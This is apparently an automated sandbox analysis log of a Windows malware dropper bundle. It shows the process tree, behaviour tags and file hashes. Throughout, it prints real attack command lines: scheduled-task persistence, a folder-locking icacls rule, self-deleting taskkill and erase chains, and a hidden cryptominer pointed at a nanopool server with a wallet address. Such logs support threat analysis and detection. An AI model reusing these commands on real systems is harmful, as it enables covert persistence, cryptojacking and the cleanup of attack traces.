C:\Program Files\Internet Explorer\iexplore.exe"C:\Program Files\Internet Explorer\iexplore.exe" http://vexacion.com/afu.php?id=12942319⤵PID:7124
-
-
C:\Program Files\Internet Explorer\iexplore.exe"C:\Program Files\Internet Explorer\iexplore.exe" http://vexacion.com/afu.php?zoneid=1492888&var=39⤵PID:3196
-
-
-
C:\Users\Admin\AppData\Local\Temp\52-6c5ed-679-341af-7407a436a42bb\Cydufoquca.exe"C:\Users\Admin\AppData\Local\Temp\52-6c5ed-679-341af-7407a436a42bb\Cydufoquca.exe"8⤵
- Executes dropped EXE
PID:572 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\nr0lm1do.msz\GcleanerEU.exe /eufive & exit9⤵PID:3436
-
C:\Users\Admin\AppData\Local\Temp\nr0lm1do.msz\GcleanerEU.exeC:\Users\Admin\AppData\Local\Temp\nr0lm1do.msz\GcleanerEU.exe /eufive10⤵
- Executes dropped EXE
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:3492 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im "GcleanerEU.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\nr0lm1do.msz\GcleanerEU.exe" & exit11⤵PID:3828
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im "GcleanerEU.exe" /f12⤵
- Kills process with taskkill
PID:1712
-
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\an4o33wn.jky\installer.exe /qn CAMPAIGN="654" & exit9⤵PID:3484
-
C:\Users\Admin\AppData\Local\Temp\an4o33wn.jky\installer.exeC:\Users\Admin\AppData\Local\Temp\an4o33wn.jky\installer.exe /qn CAMPAIGN="654"10⤵
- Executes dropped EXE
- Enumerates connected drives
- Modifies system certificate store
- Suspicious behavior: CmdExeWriteProcessMemorySpam
- Suspicious use of FindShellTrayWindow
PID:3628 -
C:\Windows\SysWOW64\msiexec.exe"C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\AW Manager\Windows Manager 1.0.0\install\97FDF62\Windows Manager - Postback Y.msi" /qn CAMPAIGN=654 AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\an4o33wn.jky\installer.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\an4o33wn.jky\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1631211270 /qn CAMPAIGN=""654"" " CAMPAIGN="654"11⤵PID:4076
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\x1fwfcuw.nzn\anyname.exe & exit9⤵PID:3656
-
C:\Users\Admin\AppData\Local\Temp\x1fwfcuw.nzn\anyname.exeC:\Users\Admin\AppData\Local\Temp\x1fwfcuw.nzn\anyname.exe10⤵
- Executes dropped EXE
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:3724
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\2i3yb32k.ozc\gcleaner.exe /mixfive & exit9⤵PID:3768
-
C:\Users\Admin\AppData\Local\Temp\2i3yb32k.ozc\gcleaner.exeC:\Users\Admin\AppData\Local\Temp\2i3yb32k.ozc\gcleaner.exe /mixfive10⤵
- Executes dropped EXE
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:3832 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im "gcleaner.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\2i3yb32k.ozc\gcleaner.exe" & exit11⤵PID:3424
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im "gcleaner.exe" /f12⤵
- Kills process with taskkill
PID:3728
-
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\gv2azpzj.nva\autosubplayer.exe /S & exit9⤵PID:3900
-
-
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun15223697c98.exe4⤵
- Loads dropped DLL
PID:1308 -
C:\Users\Admin\AppData\Local\Temp\7zS09618E34\Sun15223697c98.exeSun15223697c98.exe5⤵
- Executes dropped EXE
- Loads dropped DLL
PID:1892
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun150d896340a863.exe4⤵
- Loads dropped DLL
PID:856 -
C:\Users\Admin\AppData\Local\Temp\7zS09618E34\Sun150d896340a863.exeSun150d896340a863.exe5⤵
- Executes dropped EXE
- Loads dropped DLL
PID:1316 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1316 -s 9686⤵
- Loads dropped DLL
- Program crash
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
PID:1208
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun157ff8e4440aa.exe4⤵
- Loads dropped DLL
PID:1640 -
C:\Users\Admin\AppData\Local\Temp\7zS09618E34\Sun157ff8e4440aa.exeSun157ff8e4440aa.exe5⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1128 -
C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"6⤵
- Executes dropped EXE
- Loads dropped DLL
PID:2664 -
C:\Users\Admin\AppData\Local\Temp\Chrome 5.exe"C:\Users\Admin\AppData\Local\Temp\Chrome 5.exe"7⤵
- Executes dropped EXE
PID:3052 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit8⤵PID:2200
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'9⤵
- Creates scheduled task(s)
PID:1412
-
-
-
C:\Users\Admin\AppData\Roaming\services64.exe"C:\Users\Admin\AppData\Roaming\services64.exe"8⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Modifies system certificate store
PID:2452 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit9⤵PID:3148
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'10⤵
- Creates scheduled task(s)
PID:1996
-
-
-
C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"9⤵
- Executes dropped EXE
PID:2632
-
-
C:\Windows\explorer.exeC:\Windows\explorer.exe --cinit-find-x -B --algo=rx/0 --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr-eu2.nanopool.org:14433 --user=41o1Bi5waqLgbkV653RD7zSYeXSWRu1wnEDzPgFDFwntSnuRx7g4HbHPqNDGS6BW1bget6yyHyrPbBcVsdR6Ebxd843bMuK.add/password --pass= --cpu-max-threads-hint=30 --cinit-remote-config="v4Qq47ngFyBcSyO2uLKc6O4DG/ZgkwoY7/pmBv4ks3wJ7PR9JPsLklOJLkitFc6Y" --cinit-idle-wait=5 --cinit-idle-cpu=70 --tls --cinit-stealth9⤵PID:3840
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\PublicDwlBrowser1100.exe"C:\Users\Admin\AppData\Local\Temp\PublicDwlBrowser1100.exe"7⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1760 -
C:\ProgramData\2170890.exe"C:\ProgramData\2170890.exe"8⤵
- Executes dropped EXE
- Suspicious behavior: SetClipboardViewer
PID:2872
-
-
C:\ProgramData\4633951.exe"C:\ProgramData\4633951.exe"8⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:1656 -
C:\ProgramData\4633951.exe"C:\ProgramData\4633951.exe"9⤵
- Executes dropped EXE
PID:268
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1656 -s 7129⤵
- Program crash
- Suspicious behavior: GetForegroundWindowSpam
PID:2440
-
-
-
C:\ProgramData\110483.exe"C:\ProgramData\110483.exe"8⤵
- Executes dropped EXE
PID:2628 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2628 -s 17249⤵
- Program crash
- Suspicious behavior: GetForegroundWindowSpam
PID:1920
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\2.exe"C:\Users\Admin\AppData\Local\Temp\2.exe"7⤵PID:1644
-
C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"8⤵
- Executes dropped EXE
PID:820 -
C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"9⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
PID:3096
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\setup.exe"C:\Users\Admin\AppData\Local\Temp\setup.exe"7⤵
- Executes dropped EXE
- Loads dropped DLL
PID:1672 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im "setup.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\setup.exe" & exit8⤵PID:1528
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im "setup.exe" /f9⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1640
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\udptest.exe"C:\Users\Admin\AppData\Local\Temp\udptest.exe"7⤵
- Executes dropped EXE
- Loads dropped DLL
PID:2264
-
-
C:\Users\Admin\AppData\Local\Temp\setup_2.exe"C:\Users\Admin\AppData\Local\Temp\setup_2.exe"7⤵
- Executes dropped EXE
- Loads dropped DLL
PID:2424 -
C:\Users\Admin\AppData\Local\Temp\is-9MULR.tmp\setup_2.tmp"C:\Users\Admin\AppData\Local\Temp\is-9MULR.tmp\setup_2.tmp" /SL5="$10186,140785,56832,C:\Users\Admin\AppData\Local\Temp\setup_2.exe"8⤵
- Executes dropped EXE
PID:2484 -
C:\Users\Admin\AppData\Local\Temp\setup_2.exe"C:\Users\Admin\AppData\Local\Temp\setup_2.exe" /SILENT9⤵
- Executes dropped EXE
PID:2372 -
C:\Users\Admin\AppData\Local\Temp\is-DCIN9.tmp\setup_2.tmp"C:\Users\Admin\AppData\Local\Temp\is-DCIN9.tmp\setup_2.tmp" /SL5="$20194,140785,56832,C:\Users\Admin\AppData\Local\Temp\setup_2.exe" /SILENT10⤵
- Executes dropped EXE
- Drops file in Program Files directory
- Suspicious use of FindShellTrayWindow
PID:3016 -
C:\Users\Admin\AppData\Local\Temp\is-1OSKK.tmp\postback.exe"C:\Users\Admin\AppData\Local\Temp\is-1OSKK.tmp\postback.exe" ss111⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
PID:2660 -
C:\Windows\SysWOW64\explorer.exeexplorer.exe ss112⤵PID:392
-
C:\Users\Admin\AppData\Local\Temp\bOUQ9Vv9X.exe"C:\Users\Admin\AppData\Local\Temp\bOUQ9Vv9X.exe"13⤵
- Executes dropped EXE
- Checks processor information in registry
PID:2400 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im bOUQ9Vv9X.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\bOUQ9Vv9X.exe" & del C:\ProgramData\*.dll & exit14⤵PID:3156
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im bOUQ9Vv9X.exe /f15⤵
- Kills process with taskkill
PID:3216
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 615⤵
- Delays execution with timeout.exe
PID:3676
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Gu1Vb1CrZ.exe"C:\Users\Admin\AppData\Local\Temp\Gu1Vb1CrZ.exe"13⤵
- Executes dropped EXE
PID:3980
-
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\3002.exe"C:\Users\Admin\AppData\Local\Temp\3002.exe"7⤵
- Executes dropped EXE
PID:1696 -
C:\Users\Admin\AppData\Local\Temp\3002.exe"C:\Users\Admin\AppData\Local\Temp\3002.exe" -a8⤵
- Executes dropped EXE
PID:2836
-
-
-
C:\Users\Admin\AppData\Local\Temp\jhuuee.exe"C:\Users\Admin\AppData\Local\Temp\jhuuee.exe"7⤵
- Executes dropped EXE
PID:1944
-
-
C:\Users\Admin\AppData\Local\Temp\8.exe"C:\Users\Admin\AppData\Local\Temp\8.exe"7⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1160 -
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 1160 -s 13968⤵
- Program crash
- Suspicious behavior: GetForegroundWindowSpam
PID:2948
-
-
-
C:\Users\Admin\AppData\Local\Temp\BearVpn 3.exe"C:\Users\Admin\AppData\Local\Temp\BearVpn 3.exe"7⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2832
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun150faeb3537d.exe4⤵
- Loads dropped DLL
PID:304 -
C:\Users\Admin\AppData\Local\Temp\7zS09618E34\Sun150faeb3537d.exeSun150faeb3537d.exe5⤵
- Executes dropped EXE
- Loads dropped DLL
- Modifies system certificate store
- Suspicious use of AdjustPrivilegeToken
PID:2064 -
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im chrome.exe6⤵PID:1956
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im chrome.exe7⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1340
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun1584240df9fe73a3.exe4⤵
- Loads dropped DLL
PID:1484 -
C:\Users\Admin\AppData\Local\Temp\7zS09618E34\Sun1584240df9fe73a3.exeSun1584240df9fe73a3.exe5⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:944 -
C:\ProgramData\7056889.exe"C:\ProgramData\7056889.exe"6⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2684 -
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 2684 -s 15367⤵
- Program crash
- Suspicious behavior: GetForegroundWindowSpam
PID:2708
-
-
-
C:\ProgramData\4706992.exe"C:\ProgramData\4706992.exe"6⤵
- Executes dropped EXE
- Loads dropped DLL
- Adds Run key to start application
PID:2804 -
C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"7⤵
- Executes dropped EXE
- Loads dropped DLL
PID:2212
-
-
-
C:\ProgramData\1366689.exe"C:\ProgramData\1366689.exe"6⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
PID:2908 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2908 -s 18007⤵
- Program crash
- Suspicious behavior: GetForegroundWindowSpam
PID:2796
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun157a449716c8ee483.exe /mixone4⤵
- Loads dropped DLL
PID:804
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\7zS09618E34\Sun157a449716c8ee483.exeSun157a449716c8ee483.exe /mixone1⤵
- Executes dropped EXE
- Loads dropped DLL
PID:1604 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im "Sun157a449716c8ee483.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\7zS09618E34\Sun157a449716c8ee483.exe" & exit2⤵
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
PID:1892 -
C:\Windows\SysWOW64\taskkill.exetaskkill /im "Sun157a449716c8ee483.exe" /f3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2384
-
-
-
C:\Windows\system32\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵
- Process spawned unexpected child process
PID:2740 -
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global2⤵PID:2596
-
-
C:\Windows\system32\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵
- Process spawned unexpected child process
PID:3616 -
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global2⤵PID:2720
-
-
C:\Windows\system32\msiexec.exeC:\Windows\system32\msiexec.exe /V1⤵
- Enumerates connected drives
- Drops file in Program Files directory
- Drops file in Windows directory
- Modifies registry class
PID:3972 -
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding 8915A5297186594D524799A44674B7FC C2⤵PID:3408
-
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding 56D0A476C0ADA718CFC2F599E951150F2⤵
- Blocklisted process makes network request
PID:3820 -
C:\Windows\SysWOW64\taskkill.exe"C:\Windows\SysWOW64\taskkill.exe" /im AdvancedWindowsManager* /f3⤵
- Kills process with taskkill
PID:3068
-
-
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding 90B2546B4FCEE2322724385F57AB5C1D M Global\MSI00002⤵PID:1652
-
-
C:\Users\Admin\AppData\Local\Temp\D375.exeC:\Users\Admin\AppData\Local\Temp\D375.exe1⤵
- Executes dropped EXE
PID:2792
-
C:\Users\Admin\AppData\Local\Temp\12D6.exeC:\Users\Admin\AppData\Local\Temp\12D6.exe1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:1544 -
C:\Users\Admin\AppData\Local\Temp\12D6.exeC:\Users\Admin\AppData\Local\Temp\12D6.exe2⤵
- Executes dropped EXE
- Adds Run key to start application
PID:3868 -
C:\Windows\SysWOW64\icacls.exeicacls "C:\Users\Admin\AppData\Local\056de9b2-9931-4ac9-a925-1093ae15e65e" /deny *S-1-1-0:(OI)(CI)(DE,DC)3⤵
- Modifies file permissions
PID:3344
-
-
C:\Users\Admin\AppData\Local\Temp\12D6.exe"C:\Users\Admin\AppData\Local\Temp\12D6.exe" --Admin IsNotAutoStart IsNotTask3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:2032 -
C:\Users\Admin\AppData\Local\Temp\12D6.exe"C:\Users\Admin\AppData\Local\Temp\12D6.exe" --Admin IsNotAutoStart IsNotTask4⤵
- Executes dropped EXE
PID:3944 -
C:\Users\Admin\AppData\Local\3fb4cbe1-fc13-4d61-ae7b-1473bdb67df3\build2.exe"C:\Users\Admin\AppData\Local\3fb4cbe1-fc13-4d61-ae7b-1473bdb67df3\build2.exe"5⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:3280 -
C:\Users\Admin\AppData\Local\3fb4cbe1-fc13-4d61-ae7b-1473bdb67df3\build2.exe"C:\Users\Admin\AppData\Local\3fb4cbe1-fc13-4d61-ae7b-1473bdb67df3\build2.exe"6⤵
- Executes dropped EXE
- Checks processor information in registry
PID:3696 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im build2.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\3fb4cbe1-fc13-4d61-ae7b-1473bdb67df3\build2.exe" & del C:\ProgramData\*.dll & exit7⤵PID:2904
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im build2.exe /f8⤵
- Kills process with taskkill
PID:3220
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 68⤵
- Delays execution with timeout.exe
PID:764
-
-
-
-
-
C:\Users\Admin\AppData\Local\3fb4cbe1-fc13-4d61-ae7b-1473bdb67df3\build3.exe"C:\Users\Admin\AppData\Local\3fb4cbe1-fc13-4d61-ae7b-1473bdb67df3\build3.exe"5⤵PID:3704
-
C:\Users\Admin\AppData\Local\3fb4cbe1-fc13-4d61-ae7b-1473bdb67df3\build3.exe"C:\Users\Admin\AppData\Local\3fb4cbe1-fc13-4d61-ae7b-1473bdb67df3\build3.exe"6⤵
- Executes dropped EXE
PID:3884 -
C:\Windows\SysWOW64\schtasks.exe/C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe"7⤵
- Creates scheduled task(s)
PID:2928
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\602C.exeC:\Users\Admin\AppData\Local\Temp\602C.exe1⤵
- Executes dropped EXE
PID:3648 -
C:\Users\Admin\AppData\Local\Temp\NImH2Y6HlR.exe"C:\Users\Admin\AppData\Local\Temp\NImH2Y6HlR.exe"2⤵PID:5952
-
C:\Windows\SysWOW64\schtasks.exe/C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Network\sihost.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Creates scheduled task(s)
PID:3704
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\602C.exe"2⤵PID:8432
-
C:\Windows\SysWOW64\timeout.exetimeout /T 10 /NOBREAK3⤵
- Delays execution with timeout.exe
PID:5768
-
-
-
C:\Windows\system32\taskeng.exetaskeng.exe {56AB5A8B-9B5B-40C0-9E8B-E3C490D024A7} S-1-5-21-1669990088-476967504-438132596-1000:KJUCCLUP\Admin:Interactive:[1]1⤵PID:756
-
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:3920 -
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe3⤵PID:8132
-
C:\Windows\SysWOW64\schtasks.exe/C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe"4⤵
- Creates scheduled task(s)
PID:2232
-
-
-
-
C:\Users\Admin\AppData\Roaming\uwbfggwC:\Users\Admin\AppData\Roaming\uwbfggw2⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
PID:3692
-
-
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe2⤵
- Suspicious use of SetThreadContext
PID:8376 -
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe3⤵PID:8864
-
-
-
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe2⤵PID:8900
-
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe3⤵PID:8832
-
-
-
C:\Users\Admin\AppData\Roaming\Microsoft\Network\sihost.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\sihost.exe2⤵PID:8992
-
C:\Windows\SysWOW64\schtasks.exe/C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Network\sihost.exe"3⤵
- Creates scheduled task(s)
PID:8576
-
-
-
C:\Users\Admin\AppData\Roaming\uwbfggwC:\Users\Admin\AppData\Roaming\uwbfggw2⤵PID:6124
-
-
C:\Users\Admin\AppData\Local\056de9b2-9931-4ac9-a925-1093ae15e65e\12D6.exeC:\Users\Admin\AppData\Local\056de9b2-9931-4ac9-a925-1093ae15e65e\12D6.exe --Task2⤵PID:3664
-
C:\Users\Admin\AppData\Local\056de9b2-9931-4ac9-a925-1093ae15e65e\12D6.exeC:\Users\Admin\AppData\Local\056de9b2-9931-4ac9-a925-1093ae15e65e\12D6.exe --Task3⤵PID:820
-
-
-
C:\Users\Admin\AppData\Local\056de9b2-9931-4ac9-a925-1093ae15e65e\12D6.exeC:\Users\Admin\AppData\Local\056de9b2-9931-4ac9-a925-1093ae15e65e\12D6.exe --Task2⤵PID:1300
-
C:\Users\Admin\AppData\Local\056de9b2-9931-4ac9-a925-1093ae15e65e\12D6.exeC:\Users\Admin\AppData\Local\056de9b2-9931-4ac9-a925-1093ae15e65e\12D6.exe --Task3⤵PID:5184
-
-
-
C:\Users\Admin\AppData\Roaming\uwbfggwC:\Users\Admin\AppData\Roaming\uwbfggw2⤵PID:8200
-
-
C:\Windows\system32\taskeng.exetaskeng.exe {AB1A1EDA-7BC7-4BE1-8BE9-6228D09414BC} S-1-5-18:NT AUTHORITY\System:Service:1⤵PID:3284
-
C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe"C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe" -v 114 -t 80802⤵PID:1216
-
-
C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe"C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe" -v 115 -t 80802⤵PID:2724
-
-
C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe"C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe" -v 113 -t 80802⤵
- Executes dropped EXE
PID:3264
-
-
C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe"C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe" -v 112 -t 80802⤵PID:4024
-
-
C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe"C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe" -v 111 -t 80802⤵PID:2664
-
-
C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe"C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe" -v 110 -t 80802⤵PID:2668
-
-
C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe"C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe" -v 113 -t 80802⤵PID:3096
-
-
C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe"C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe" -v 111 -t 80802⤵PID:6584
-
-
C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe"C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe" -v 112 -t 80802⤵PID:4004
-
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
MD5
3395b4ebf2f9d73b7cfedd56ac53dd1f
SHA1d6c9f3d9b31abbd7541cb0054150bfe0b55c32d9
SHA256492cf348ec25b9315a855de615caf790f42557af9afde258de12264288db5c04
SHA51229723fb3cf6cac99183931fb7e062885a4bf8da3ba2707991d99b950d732ee6e695a7fbe644625355102492391790d57e95b0511a4bb10ad6e8acfb9a27aa05a
-
MD5
3395b4ebf2f9d73b7cfedd56ac53dd1f
SHA1d6c9f3d9b31abbd7541cb0054150bfe0b55c32d9
SHA256492cf348ec25b9315a855de615caf790f42557af9afde258de12264288db5c04
SHA51229723fb3cf6cac99183931fb7e062885a4bf8da3ba2707991d99b950d732ee6e695a7fbe644625355102492391790d57e95b0511a4bb10ad6e8acfb9a27aa05a
-
MD5
f1e2bb0a62bf371a71b62224b18a69b8
SHA1872738f6cac0e95a4a0625f9d6b6788cf0dbdfa2
SHA256aec3efab3db88776950250c0bdc2a3be0e8fdb9c07fbcef83549bfa3bedc34ab
SHA512ce257f0686c9552759f3d06d8218ac4c5c16350fb673843f06d188aeb8bb531fcf7f29a61c60ef52944e6f72ccfe91adff993c791959585c2fe7f1a1c1fe88f6
-
MD5
f1e2bb0a62bf371a71b62224b18a69b8
SHA1872738f6cac0e95a4a0625f9d6b6788cf0dbdfa2
SHA256aec3efab3db88776950250c0bdc2a3be0e8fdb9c07fbcef83549bfa3bedc34ab
SHA512ce257f0686c9552759f3d06d8218ac4c5c16350fb673843f06d188aeb8bb531fcf7f29a61c60ef52944e6f72ccfe91adff993c791959585c2fe7f1a1c1fe88f6
-
MD5
7b6eb77a0b2d52b2b7fe300408423ef1
SHA1b119a9db86c3a6fce3c2bc08bfd1fd623fd4b156
SHA256de8047fdfcf313b5868ec23cb91c5c04d431f85e91eeac10c0d4f52b22e8448d
SHA512e101e3ddd0373be3e66b7337698efc4567020e7bdcdff5baa99421dd2d053f570140488e0e6efccaee7ac8547d45153651191acfa93c7cf9174e9a88403c110e
-
MD5
7b6eb77a0b2d52b2b7fe300408423ef1
SHA1b119a9db86c3a6fce3c2bc08bfd1fd623fd4b156
